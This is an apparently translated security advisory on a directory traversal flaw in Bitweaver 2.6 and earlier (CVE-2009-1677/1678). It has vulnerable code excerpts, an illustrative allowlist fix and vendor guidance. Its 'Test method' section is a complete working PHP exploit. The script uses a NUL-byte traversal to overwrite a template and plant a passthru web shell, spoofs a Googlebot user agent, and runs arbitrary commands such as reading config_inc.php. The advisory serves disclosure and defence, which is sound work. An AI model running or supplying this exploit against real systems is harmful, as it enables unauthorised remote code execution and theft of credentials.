Bitweaver version Parameter Directory Traversal Vulnerability

Release date: 2009-05-12
Update date: 2009-05-13

Affected systems:
Bitweaver Bitweaver <= 2.6
Description:
BUGTRAQ ID: 34910
CVE(CAN) ID: CVE-2009-1678, CVE-2009-1677

Bitweaver is a free, open-source web application framework and content management system.

Bitweaver's boards/boards_rss.php module does not properly filter the input passed in the version parameter before using it to create a file:

    ...
    echo $rss->saveFeed( $rss_version_name, $cacheFile );
    ...
    
saveFeed() is called in an unsafe way: its filename argument is derived from the $_REQUEST[version] variable and may therefore contain directory traversal sequences.

In the saveFeed() function of /rss/feedcreator.class.php:
    
    ...
    function saveFeed($filename="", $displayContents=true) {
        if ($filename=="") {
            $filename = $this->_generateFilename();
        }
        if ( !is_dir( dirname( $filename ))) {
            mkdir_p( dirname( $filename ));
        }
        $feedFile = fopen($filename, "w+");
        if ($feedFile) {
            fputs($feedFile,$this->createFeed());
            fclose($feedFile);
            if ($displayContents) {
                $this->_redirect($filename);
            }
        } else {
            echo "<br /><b>Error creating feed file, please check write permissions.</b><br/>";
        }
    }
    ...
    
Regardless of the php.ini settings, a user can thus create arbitrary directories, overwrite existing files, and terminate the path with an arbitrary extension.
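The root cause above is that a request value reaches the filename argument of saveFeed() unchanged. The following is an added example, not Bitweaver's own code, of how the cache file path for the feed could instead be derived from a strict allowlist and confined to the cache directory; the $cacheDir layout, the file naming scheme and the allowlist contents are assumptions made for illustration.

```php
<?php
// Added example (not Bitweaver's code): derive the RSS cache file path from
// the requested feed version without ever using the raw request value as a path.
// The allowlist contents and the cache layout below are assumptions.

// Only feed formats the application actually generates are accepted.
const ALLOWED_RSS_VERSIONS = ['RSS0.91', 'RSS1.0', 'RSS2.0', 'ATOM0.3'];

/**
 * Return the cache file path for the requested feed version, or null when
 * the request value is not one of the known versions.
 */
function safeCacheFile(string $cacheDir, string $requested): ?string
{
    // Strict, case-sensitive allowlist comparison: "../", NUL bytes and any
    // attacker-chosen extension are rejected before a filename is built.
    if (!in_array($requested, ALLOWED_RSS_VERSIONS, true)) {
        return null;
    }
    $cacheDir  = rtrim($cacheDir, '/');
    $candidate = $cacheDir . '/boards_' . str_replace('.', '_', $requested) . '.xml';

    // Defence in depth: the directory the file will be written to must resolve
    // to the cache directory itself, which also catches a misconfigured $cacheDir.
    $realDir    = realpath($cacheDir);
    $realParent = realpath(dirname($candidate));
    if ($realDir === false || $realParent === false || $realParent !== $realDir) {
        return null;
    }
    return $candidate;
}

// Constructed inputs: one legitimate request and one traversal attempt.
$cacheDir = sys_get_temp_dir() . '/bitweaver_cache_example';
@mkdir($cacheDir, 0700);
var_dump(safeCacheFile($cacheDir, 'RSS2.0'));             // string ".../boards_RSS2_0.xml"
var_dump(safeCacheFile($cacheDir, "/../../../x.tpl\0"));  // NULL: rejected by the allowlist
```

The same check belongs in any caller that lets saveFeed() choose a path from user input; the fopen()/mkdir_p() calls in saveFeed() itself remain unchanged.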

<*Source: bookoo
  
  Links: http://secunia.com/advisories/35057/
        http://marc.info/?l=bugtraq&m=124213918429416&w=2
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear the risk themselves!

<?php

    $err[0] = "[!] This script is intended to be launched from the cli!";
    $err[1] = "[!] You need the curl extesion loaded!";
    
    if (php_sapi_name() <> "cli") {
        die($err[0]);
    }
    if (!extension_loaded('curl')) {
        $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
        false;
        if ($win) {
            !dl("php_curl.dll") ? die($err[1]) :
            nil;
        } else {
            !dl("php_curl.so") ? die($err[1]) :
            nil;
        }
    }
    
    function syntax() {
        print (
        "Syntax: php ".$argv[0]." [host] [path] [user] [pass] [cmd] [options]   \n".
        "Options:                                                               \n".
        "--port:[port]       - specify a port                                   \n".
        "                      default->80                                      \n".
        "--proxy:[host:port] - use proxy                                        \n".
        "Examples:   php ".$argv[0]." 192.168.0.1 /bitweaver/ bookoo pass ls    \n".
        "            php ".$argv[0]." 192.168.0.1 / bookoo pass ls -a --proxy:1.1.1.1:8080\n".
        "            php ".$argv[0]." 192.168.0.1 / bookoo pass cat ../kernel/config_inc.php --port:81");
        die();
    }
    
    
    error_reporting(E_ALL);
    $host = $argv[1];
    $path = $argv[2];
    $_usr = $argv[3];
    $_pwd = $argv[4];
    $_cmd = "";
    for ($i = 5; $i < $argc; $i++) {
        if ((!strstr($argv[$i], "--proxy:")) and (!strstr($argv[$i], "--port:"))) {
            $_cmd .= " ".$argv[$i];
        }
    }
    $argv[5] ? print("[*] Command->$_cmd\n") :
     syntax();
    $_use_proxy = false;
    $port = 80;
    
    for ($i = 3; $i < $argc; $i++) {
        if (stristr($argv[$i], "--proxy:")) {
            $_use_proxy = true;
            $tmp = explode(":", $argv[$i]);
            $proxy_host = $tmp[1];
            $proxy_port = (int)$tmp[2];
        }
        if (stristr($argv[$i], "--port:")) {
            $tmp = explode(":", $argv[$i]);
            $port = (int)$tmp[1];
        }
    }
    
    function _s($url, $cmd, $is_post, $request) {
        global $_use_proxy, $proxy_host, $proxy_port, $cookie;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($is_post) {
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n");
        }
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/1.0 (googlebot@googlebot.com http://googlebot.com/)");
        curl_setopt($ch, CURLOPT_TIMEOUT, 0);
        curl_setopt($ch, CURLOPT_HEADER, 1);
        $headers = array("Cookie: $cookie", "Cmd: ".$cmd." > ./../readme");
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        
        if ($_use_proxy) {
            curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
        }
        $_d = curl_exec($ch);
        if (curl_errno($ch)) {
            die("[!] ".curl_error($ch)."\n");
        } else {
            curl_close($ch);
        }
        return $_d;
    }
    
    $my_template = "themes/templates/footer_inc.tpl";
    $url = "http://$host:$port".$path."boards/boards_rss.php";
    $_o = _s($url, "", 0, "");
    if (stristr($_o, "404 Not Found")) {
        die ("[!] Vulnerable script not found!\n");
    }
    //catch site cookie, this is needed for version compatibility, not needed in 2.6.0
    $_tmp = explode("Set-Cookie: ", $_o);
    $cookie = "";
    for ($i = 1; $i < count($_tmp); $i++) {
        $_tmpii = explode(";", $_tmp[$i]);
         $cookie .= $_tmpii[0]."; ";
    }
    print("[*] Cookie->".$cookie."\n");
    $_o = _s($url, "", 1, "version=/\x00&");
    $_o = _s($url, "", 1, "u=$_usr&p=$_pwd&version=/../../../../$my_template\x00&");
    if (stristr($_o, "<?xml version=\"1.0\" encoding=\"UTF-8\"?>")) {
        print ("[*] '$my_template' successfully overwritten!\n");
    } else {
        print($_o);
        die("[!] Error! No write permission on /".$my_template." ...");
    }
    if (stristr($_o, "{php}passthru(\$_SERVER[HTTP_CMD]);{/php}")) {
        print ("[*] Shell injected!\n");
    } else {
        print($_o);
        die("[!] Error! Shell not injected!");
    }
    $url = "http://$host:$port".$path."wiki/index.php";
    $_o = _s($url, $_cmd, 0, "");
    $url = "http://$host:$port".$path."readme";
    $_o = _s($url, "", 0, "");
    if (stristr($_o, "404 Not Found")) {
        die ("[!] stdout file not found!\n");
    } else {
        print("[*] Success!\n".$_o);
    }
?>

Recommendations:
Vendor patch:

Bitweaver
---------
The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's homepage for the latest version:

http://www.bitweaver.org/

This security advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.